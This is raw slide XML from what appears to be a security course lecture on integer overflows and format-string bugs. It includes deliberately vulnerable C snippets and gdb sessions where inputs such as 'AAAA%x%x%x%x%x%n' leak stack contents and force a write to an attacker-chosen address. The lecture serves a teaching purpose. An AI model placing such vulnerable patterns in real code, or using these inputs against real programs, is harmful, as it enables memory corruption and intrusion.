              <a:rPr sz="2250"/>
              <a:t>In this section, we'll cover some more major classes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Integer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Format strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Function pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376944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Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="Shape 7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Class of bugs resulting from limitations of integer presentations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Integer overflows don't directly lead to buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>But, can be used to bypass bounds checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Can result in unintended execution paths or incorrect computations with security implications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314450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Integer Representation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758" name="Shape 7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Recall that integers are represented as fixed-width binary numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Arithmetic performed mod 2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" baseline="31999"/>
              <a:t>W</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>What happens when an integer is too large to represent?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>Undefined behavior</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Compilers can do anything they like!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>In practice, overflows are ignored, and computation continues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Perhaps with incorrect results...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165957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Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="762" name="Shape 762"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695596" y="1344057"/>
            <a:ext cx="5302678" cy="2442217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x = 0xffffffff;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y = 1;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r = x + y;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76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5199" y="4063094"/>
            <a:ext cx="4241602" cy="13037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993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" grpId="0" animBg="1" advAuto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Width Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="Shape 7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18242">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241093" algn="l"/>
                <a:tab pos="491115" algn="l"/>
                <a:tab pos="741138" algn="l"/>
                <a:tab pos="982231" algn="l"/>
                <a:tab pos="1232253" algn="l"/>
                <a:tab pos="1482275" algn="l"/>
                <a:tab pos="1732298" algn="l"/>
                <a:tab pos="1973391" algn="l"/>
                <a:tab pos="2223413" algn="l"/>
                <a:tab pos="2473435" algn="l"/>
                <a:tab pos="2714528" algn="l"/>
                <a:tab pos="2964551" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="167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uint32_t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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x </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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7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7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0x10000</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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18242">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241093" algn="l"/>
                <a:tab pos="491115" algn="l"/>
                <a:tab pos="741138" algn="l"/>
                <a:tab pos="982231" algn="l"/>
                <a:tab pos="1232253" algn="l"/>
                <a:tab pos="1482275" algn="l"/>
                <a:tab pos="1732298" algn="l"/>
                <a:tab pos="1973391" algn="l"/>
                <a:tab pos="2223413" algn="l"/>
                <a:tab pos="2473435" algn="l"/>
                <a:tab pos="2714528" algn="l"/>
                <a:tab pos="2964551" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="167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uint16_t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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y </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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7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7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67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18242">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241093" algn="l"/>
                <a:tab pos="491115" algn="l"/>
                <a:tab pos="741138" algn="l"/>
                <a:tab pos="982231" algn="l"/>
                <a:tab pos="1232253" algn="l"/>
                <a:tab pos="1482275" algn="l"/>
                <a:tab pos="1732298" algn="l"/>
                <a:tab pos="1973391" algn="l"/>
                <a:tab pos="2223413" algn="l"/>
                <a:tab pos="2473435" algn="l"/>
                <a:tab pos="2714528" algn="l"/>
                <a:tab pos="2964551" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="167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uint16_t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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z </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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7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x </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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7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y;     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="167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z = ?</a:t>
            </a:r>
            <a:endParaRPr sz="1671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18242">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241093" algn="l"/>
                <a:tab pos="491115" algn="l"/>
                <a:tab pos="741138" algn="l"/>
                <a:tab pos="982231" algn="l"/>
                <a:tab pos="1232253" algn="l"/>
                <a:tab pos="1482275" algn="l"/>
                <a:tab pos="1732298" algn="l"/>
                <a:tab pos="1973391" algn="l"/>
                <a:tab pos="2223413" algn="l"/>
                <a:tab pos="2473435" algn="l"/>
                <a:tab pos="2714528" algn="l"/>
                <a:tab pos="2964551" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="835">
              <a:solidFill>
                <a:srgbClr val="D43A7D"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="309403" indent="-309403" defTabSz="406644">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>Width overflows occur when assignments are made to variables that can't store the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="309403" indent="-309403" defTabSz="406644">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>Integer promotion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Computation involving two variables </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" i="1"/>
              <a:t>x, y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t> where width(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" i="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>) &gt; width(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" i="1"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>)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 i="1"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t> is promoted such that width(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" i="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>) = width(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227" i="1"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="309403" indent="-309403" defTabSz="406644">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>Integer demotion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Computation truncated to width of destination</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9725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/>
              <a:t>Sign Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="773" name="Shape 7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f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687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len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dst_buf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64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len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64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687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memcpy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dst_buf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len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844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Sign overflows occur when an unsigned variable is treated as signed, or vice-versa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Can occur when mixing signed and unsigned variables in an expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Or, wraparound when performing arithmetic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3334181" y="1685800"/>
            <a:ext cx="4046483" cy="602265"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46878"/>
              <a:gd name="adj2" fmla="val 128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memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(void *, void *, unsigned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9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hape 7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Sign Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Shape 7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g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sk,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out,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out_len)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x_buf[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256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y_buf[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256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unsigned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x_len, y_len;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recv(sk,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x_len,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(x_len));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recv(sk,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&amp;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y_len,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(y_len));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total_len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x_len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y_len;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(total_len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out_len)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-1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memcpy(out, x_buf, x_len);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memcpy(out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x_len, y_buf, y_len);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585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Format Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Shape 7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printf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const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format, ...);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/>
              <a:t>The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*printf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> family of functions is used to format string data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>The format string controls presentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Contains a mixture of static data and variable placeholders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Placeholders have a grammar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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%&lt;pos&gt;&lt;flags&gt;&lt;out-width&gt;&lt;prec&gt;&lt;in-width&gt;&lt;conv&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Variables passed as additional arguments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252796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Format Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Shape 7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Many formatting directives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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%s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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%d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>decimal number</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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%x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>hexadecimal number</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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%p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>print a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>pointer</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>write the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>number </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>of bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>output to the stream</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>If an attacker can control a format string, any location in memory can be overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>All members of the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> family are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1" smtClean="0"/>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>, etc.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21797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Format Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Shape 78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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> directive is special</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Others simply print a value from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> writes the number of bytes printed so far to an address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Attack requirements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Control the number of bytes written (value to write)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Control the destination address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316334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Memory References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838200" y="3862933"/>
            <a:ext cx="4782358" cy="2493417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="293776" indent="-293776" defTabSz="386106">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2115" dirty="0"/>
              <a:t>Base – Starting address of reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293776" indent="-293776" defTabSz="386106">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2115" dirty="0"/>
              <a:t>Index – Offset from base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293776" indent="-293776" defTabSz="386106">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2115" dirty="0"/>
              <a:t>Scale – Constant multiplier of index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293776" indent="-293776" defTabSz="386106">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2115" dirty="0"/>
              <a:t>Displacement – Constant base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293776" indent="-293776" defTabSz="386106">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2115" dirty="0"/>
              <a:t>Width – Size of reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="memref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0831" y="1340371"/>
            <a:ext cx="6650338" cy="214017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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418967" y="3862933"/>
            <a:ext cx="4021368" cy="238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056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7584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112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62640" indent="-31252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1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" smtClean="0"/>
              <a:t>byte – Obvious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" smtClean="0"/>
              <a:t>word – 16 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" smtClean="0"/>
              <a:t>dword – 32 bits (double word)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" smtClean="0"/>
              <a:t>qword – 64 bits (quad word)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343281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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="793" name="Shape 7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main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argc,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argv)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buf[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256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snprintf(buf,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(buf), argv[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printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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"buf = %s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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sz="225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buf);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&gt; ./vuln hello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 = hello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&gt; ./vuln 'hello %x %x %x %x %x'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 = hello ffffd7fc 3df6174 f7f35b46 100 80499d4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341320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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79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7643" y="1494300"/>
            <a:ext cx="5536714" cy="46062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2115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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="Shape 8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r ’hello %x %x %x %x %x’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Breakpoint 1, 0xf7d18450 in snprintf ()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x/8xw $esp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0xffffd7dc: 0x0804869e 0xffffd800 0x00000100 0xffffdb4f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0xffffd7ec: 0xffffd7fc 0x03df6174 0xf7f35b46 0x00000100 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69863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805" name="Shape 8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844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(gdb)r’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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AAAA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%x%x%x%x%x%x’</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1687">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>buf = AAAA ffffd7fc 3df6174 f7f35b46 100 80499d4 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="844"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="1687">
              <a:solidFill>
                <a:srgbClr val="FF2500"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>By printing up the stack, we can find a known sequence of bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>But, so far we can only print data...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1464074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809" name="Shape 8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)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r’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" dirty="0" err="1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AAAA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%x%x%x%x%x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" dirty="0" err="1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%n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’ </a:t>
            </a:r>
            <a:endParaRPr sz="1687" dirty="0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Program received signal SIGSEGV, Segmentation fault. </a:t>
            </a:r>
            <a:endParaRPr sz="1687" dirty="0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0xf7d13410 in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" b="1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vfprintf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 () from /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usr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/lib32/libc.so.6 </a:t>
            </a:r>
            <a:endParaRPr sz="1687" dirty="0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) x/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i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 $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eip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 </a:t>
            </a:r>
            <a:endParaRPr sz="1687" dirty="0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=&gt; 0xf7d13410: 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 DWORD PTR [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],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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" b="1" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1687" dirty="0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) p/x $</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687" dirty="0" err="1"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1687" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1687" dirty="0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 dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>$1 = 0x41414141 </a:t>
            </a:r>
            <a:endParaRPr sz="844" dirty="0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844"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="98223" algn="l"/>
                <a:tab pos="321457" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="844" dirty="0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844"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="98223" algn="l"/>
                <a:tab pos="321457" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="914" dirty="0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We can use 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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> to write the number of bytes written so far to an address we control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3033688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813" name="Shape 8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Choose the address of data to overwrite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Write that address to the stack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Find that address on the stack</a:t>
            </a:r>
